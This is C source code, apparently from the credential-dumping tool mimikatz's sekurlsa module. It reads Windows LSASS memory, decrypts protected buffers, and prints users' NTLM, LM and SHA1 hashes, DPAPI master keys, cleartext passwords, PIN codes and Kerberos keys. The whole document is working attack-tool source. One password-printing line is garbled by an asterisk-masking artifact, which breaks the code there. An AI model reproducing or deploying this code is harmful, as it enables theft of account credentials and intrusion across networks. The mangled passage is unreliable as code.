VOID kuhl_m_sekurlsa_genericKeyOutput(PMARSHALL_KEY key, PVOID * dirtyBase) { switch(key->unkId) { case 0x00010002: case 0x00010003: dprintf("\n\t * NTLM : "); break; case 0x00020002: dprintf("\n\t * SHA1 : "); break; case 0x00030002: case 0x00030003: dprintf("\n\t * RootKey : "); break; case 0x00040002: case 0x00040003: dprintf("\n\t * DPAPI : "); break; default: dprintf("\n\t * %08x : ", key->unkId); } kull_m_string_dprintf_hex((PBYTE) *dirtyBase + sizeof(ULONG), key->length, 0); *dirtyBase = (PBYTE) *dirtyBase + sizeof(ULONG) + *(PULONG) *dirtyBase; }
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_masterkeys(IN ULONG_PTR pMasterKeyCacheList, IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData) { KIWI_MASTERKEY_CACHE_ENTRY mesCredentials; ULONG_PTR ptr; ULONG monNb = 0; PBYTE buffer; if(ReadMemory(pMasterKeyCacheList, &mesCredentials, sizeof(LIST_ENTRY), NULL)) { ptr = (ULONG_PTR) mesCredentials.Flink; while(ptr != pMasterKeyCacheList) { if(ReadMemory(ptr, &mesCredentials, sizeof(KIWI_MASTERKEY_CACHE_ENTRY), NULL)) { if(RtlEqualLuid(pData->LogonId, &mesCredentials.LogonId)) { dprintf("\n\t [%08x]\n\t * GUID :\t", monNb++); kull_m_string_displayGUID(&mesCredentials.KeyUid); dprintf("\n\t * Time :\t"); kull_m_string_displayFileTime(&mesCredentials.insertTime); if(buffer = (PBYTE) LocalAlloc(LPTR, mesCredentials.keySize)) { if(ReadMemory(ptr + FIELD_OFFSET(KIWI_MASTERKEY_CACHE_ENTRY, key), buffer, mesCredentials.keySize, NULL)) { kuhl_m_sekurlsa_nt6_LsaUnprotectMemory(buffer, mesCredentials.keySize); dprintf("\n\t * MasterKey :\t"); kull_m_string_dprintf_hex(buffer, mesCredentials.keySize, 0); } LocalFree(buffer); } } ptr = (ULONG_PTR) mesCredentials.Flink; } else break; } } else dprintf("KO"); }
VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCreds, PLUID luid, ULONG flags) { PUNICODE_STRING credentials, username = NULL, domain = NULL, password = NULL; PMSV1_0_PRIMARY_CREDENTIAL pPrimaryCreds; PRPCE_CREDENTIAL_KEYCREDENTIAL pRpceCredentialKeyCreds; PKERB_HASHPASSWORD_6 pHashPassword; UNICODE_STRING buffer; PVOID base; DWORD type, i; if(mesCreds) { if(flags & KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIAL) { type = flags & KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIAL_MASK; credentials = (PUNICODE_STRING) mesCreds; if(credentials->Buffer) { if(!(flags & KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT)/* && *lsassLocalHelper->pLsaUnprotectMemory*/) kuhl_m_sekurlsa_nt6_LsaUnprotectMemory(((PUNICODE_STRING) mesCreds)->Buffer, ((PUNICODE_STRING) mesCreds)->Length); switch(type) { case KUHL_SEKURLSA_CREDS_DISPLAY_PRIMARY: pPrimaryCreds = (PMSV1_0_PRIMARY_CREDENTIAL) credentials->Buffer; kuhl_m_sekurlsa_utils_NlpMakeRelativeOrAbsoluteString(pPrimaryCreds, &pPrimaryCreds->UserName, FALSE); kuhl_m_sekurlsa_utils_NlpMakeRelativeOrAbsoluteString(pPrimaryCreds, &pPrimaryCreds->LogonDomainName, FALSE); dprintf("\n\t * Username : %wZ\n\t * Domain : %wZ", &pPrimaryCreds->UserName, &pPrimaryCreds->LogonDomainName); if(pPrimaryCreds->isLmOwfPassword) { dprintf("\n\t * LM : "); kull_m_string_dprintf_hex(pPrimaryCreds->LmOwfPassword, LM_NTLM_HASH_LENGTH, 0); } if(pPrimaryCreds->isNtOwfPassword) { dprintf("\n\t * NTLM : "); kull_m_string_dprintf_hex(pPrimaryCreds->NtOwfPassword, LM_NTLM_HASH_LENGTH, 0); } if(pPrimaryCreds->isShaOwPassword) { dprintf("\n\t * SHA1 : "); kull_m_string_dprintf_hex(pPrimaryCreds->ShaOwPassword, SHA_DIGEST_LENGTH, 0); } break; case KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIALKEY: pRpceCredentialKeyCreds = (PRPCE_CREDENTIAL_KEYCREDENTIAL) credentials->Buffer; base = (PBYTE) pRpceCredentialKeyCreds + sizeof(RPCE_CREDENTIAL_KEYCREDENTIAL) + (pRpceCredentialKeyCreds->unk0 - 1) * sizeof(MARSHALL_KEY); for (i = 0; i < pRpceCredentialKeyCreds->unk0; i++) kuhl_m_sekurlsa_genericKeyOutput(&pRpceCredentialKeyCreds->key[i], &base); break; default: dprintf("\n\t * Raw data : "); kull_m_string_dprintf_hex(credentials->Buffer, credentials->Length, 1); } } } else if(flags & KUHL_SEKURLSA_CREDS_DISPLAY_PINCODE) { if(mesCreds->UserName.Buffer) { if(kull_m_string_getDbgUnicodeString(&mesCreds->UserName)) { if(!(flags & KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT)/* && *lsassLocalHelper->pLsaUnprotectMemory*/) kuhl_m_sekurlsa_nt6_LsaUnprotectMemory(mesCreds->UserName.Buffer, mesCreds->UserName.MaximumLength); dprintf("\n\t * PIN code : %wZ", &mesCreds->UserName); LocalFree(mesCreds->UserName.Buffer); } } } else if(flags & KUHL_SEKURLSA_CREDS_DISPLAY_KEY_LIST) { pHashPassword = (PKERB_HASHPASSWORD_6) mesCreds; dprintf("\n\t\t%s : ", kuhl_m_kerberos_ticket_etype(pHashPassword->Type)); if(buffer.Length = buffer.MaximumLength = (USHORT) pHashPassword->Size) { buffer.Buffer = (PWSTR) pHashPassword->Checksump; if(kull_m_string_getDbgUnicodeString(&buffer)) { if(!(flags & KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT)/* && *lsassLocalHelper->pLsaUnprotectMemory*/) kuhl_m_sekurlsa_nt6_LsaUnprotectMemory(buffer.Buffer, buffer.MaximumLength); kull_m_string_dprintf_hex(buffer.Buffer, buffer.Length, 0); LocalFree(buffer.Buffer); } } else dprintf("<no size, buffer is incorrect>"); } else { if(mesCreds->UserName.Buffer || mesCreds->Domaine.Buffer || mesCreds->Password.Buffer) { if(kull_m_string_getDbgUnicodeString(&mesCreds->UserName) && kull_m_string_suspectUnicodeString(&mesCreds->UserName)) { if(!(flags & KUHL_SEKURLSA_CREDS_DISPLAY_DOMAIN)) username = &mesCreds->UserName; else domain = &mesCreds->UserName; } if(kull_m_string_getDbgUnicodeString(&mesCreds->Domaine) && kull_m_string_suspectUnicodeString(&mesCreds->Domaine)) { if(!(flags & KUHL_SEKURLSA_CREDS_DISPLAY_DOMAIN)) domain = &mesCreds->Domaine; else username = &mesCreds->Domaine; } if(kull_m_string_getDbgUnicodeString(&mesCreds->Password) /*&& !kull_m_string_suspectUnicodeString(&mesCreds->Password)*/) { if(!(flags & KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT)/* && *lsassLocalHelper->pLsaUnprotectMemory*/) kuhl_m_sekurlsa_nt6_LsaUnprotectMemory(mesCreds->Password.Buffer, mesCreds->Password.MaximumLength); password = &mesCreds->Password; } if(password || !(flags & KUHL_SEKURLSA_CREDS_DISPLAY_WPASSONLY)) { dprintf((flags & KUHL_SEKURLSA_CREDS_DISPLAY_LINE) ? "%wZ\t%wZ\t" : "\n\t * Username : %wZ" "\n\t * Domain : %wZ" "\n\t * Password : "******"%.*S", password->Length / sizeof(wchar_t), password->Buffer); else dprintf("%wZ", password ? password : &uNull); } else kull_m_string_dprintf_hex(password->Buffer, password->Length, 1); } LocalFree(mesCreds->UserName.Buffer); LocalFree(mesCreds->Domaine.Buffer); LocalFree(mesCreds->Password.Buffer); } } if(flags & KUHL_SEKURLSA_CREDS_DISPLAY_NEWLINE) dprintf("\n"); } else dprintf("LUID KO\n"); }